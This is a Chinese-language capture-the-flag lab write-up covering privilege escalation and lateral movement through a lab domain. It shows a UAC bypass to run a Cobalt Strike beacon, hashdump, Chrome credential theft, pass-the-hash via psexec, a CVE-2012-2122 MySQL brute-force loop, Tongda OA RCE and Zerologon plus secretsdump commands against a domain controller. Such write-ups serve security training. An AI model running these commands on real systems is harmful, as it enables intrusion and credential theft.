我们在上半部分拿到了weblogic的shell并成功上线cs,但是是一个user权限,局限性很大,我们继续来对weblogic的beacon进行提权探究。
这里因为是1904的系统,尝试使用bypassuac进行提权,原理的话就是有一些系统程序是会直接获取管理员权限同时不弹出UAC弹窗,这类程序被称为白名单程序。这些程序拥有autoElevate属性的值为True,会在启动时就静默提升权限。
那么我们要寻找的uac程序需要符合以下几个要求:
1.
程序的manifest标识的配置属性 autoElevate 为true
2.
程序不弹出UAC弹窗
3.
从注册表里查询Shell\Open\command键值对
这里直接使用到github上的bypassuac
image-20220107121431183
执行shell C:\tmp\bypassuac.exe C:\tmp\beacon.exe
image-20220107121707210
然后在入口主机执行connect 10.10.10.10
即可上线,这里我们看一下提权上线后的右上角是有一个*号的
image-20220107121721076
在之前我们没有提权的beacon上执行shell whoami /priv
可以看到是没有调试权限的
image-20220107121814660
再到我们提权后的beacon执行,有了调试程序的权限,这里其实已经相当于是一个管理员的权限了,可以抓取密码
image-20220107121837968
在之前的beacon上执行hashdump会报错没有调试权限
image-20220107122435929
在提权后的beacon成功执行hashdump
image-20220107122452483
到这里我们就上线了两台主机了,这里难道同网段就没有主机存活了吗,那么我们在10.10.10.10这台主机上再执行命令进行一次扫描
image-20220107122747395
扫到另外一台存活主机的IP为10.10.10.30开放了445端口,这里因为设置了入站规则所以在10.10.10.5主机上是扫描不到这台10.10.10.30的主机的
image-20220107123931789
这里使用tasklist /svc
查看进程发现用chrome.exe
进程
image-20220107123957991
使用梼杌插件的抓取chrome保存的信息发现有一个hack4
的账号
image-20220107124102094
那么很可能这是10.10.10.30这台主机的账号跟密码,这里就使用到smb beacon尝试使用psexec上线,这里首先创建一个SMB beacon
image-20220107124139187
这里使用到psexec进行pth
image-20220107124157770
报错是could not upload file:5
,这个报错产生的原因就是不能打开匿名管道,我们知道psexec的原理就是通过打开admin$管道来实现横向移动。
image-20220107124229387
那么这里猜测可能要使用管理员的账户去pth,密码的话还是相同
image-20220107140040589
这里使用管理员的账户成功pth
image-20220107140047078
上线是一个system权限的beacon
image-20220107140059157
在根目录下发现两个txt
image-20220107140120830
成功拿到第6个flag,还有一个mysql.txt,这里我们之前在192段进行扫描的时候发现了一台主机开放了3306端口,进行连接的尝试
image-20220107140152464
这里使用navicat连接是连接成功了,但是翻半天也没有找到flag在哪
image-20220107140938072
这里使用goby去扫一下
image-20220107141128017
发现存在cve-2012-2122,这个漏洞的原理为,当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。
image-20220107141140787
发送exp过去验证一下,是能够利用的
image-20220107141353447
在kali里面使用exp进行攻击,使用的是root账户
for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.1.11 ; done
image-20220107141444710
通过数据库语句查询拿到了第七个flag
image-20220107141517786
然后再对10.10.10.30这台主机进行信息搜集,发现为双网卡,其中一张网卡通向172.18.50.0/24段
image-20220107141542895
那么我们再对172.18.50.0/24段进行存活主机扫描
portscan 172.18.50.1-255 1-1000,3389,5000-6000
image-20220107142045780
发现172.18.50.9开放了80端口
image-20220107142119530
这里cs开一个socks代理端口
image-20220107142144119
访问一下是一个通达oa
image-20220107143057742
这里通过通达oa的远程命令执行rce拿到shell
image-20220107144334829
在根目录下发现了第8个flag
image-20220107144435322
然后还是使用tcp beacon上线cs
image-20220107144456491
执行beacon.exe
image-20220107144532161
在172.18.50.9主机上执行connect 172.18.50.35
进行连接
QQ截图20220110151011
上线之后执行hashdump抓取密码
image-20220107145234680
尝试直接进行pth连接域控失败,1326报错的原因是错误的用户名或密码
image-20220107145241415
那么继续进行信息搜集,发现在redteam.com
域内,这里进行了一系列尝试都失败,这里用到cve-2020-1472进行攻击
image-20220107145414826
先socks配合proxifier代理流量到本地
image-20220107145540691
使用poc监测到DC存在CVE-2020-1472漏洞
image-20220107154039846
先把域控的密码置空
python cve-2020-1472-exploit.py DC$ 172.18.50.9
image-20220107154155552
然后使用impacket里面的secretsdump.py
获取hash
python secretsdump.py redteam/DC$@172.18.50.9 -nopass
image-20220107154247786
这里拿到了管理员的hash,那么还是使用SMB beacon进行pth
1
pth成功
image-20220107154541171
成功上线
2
拿到第九个flag,渗透任务完成
image-20220107154741750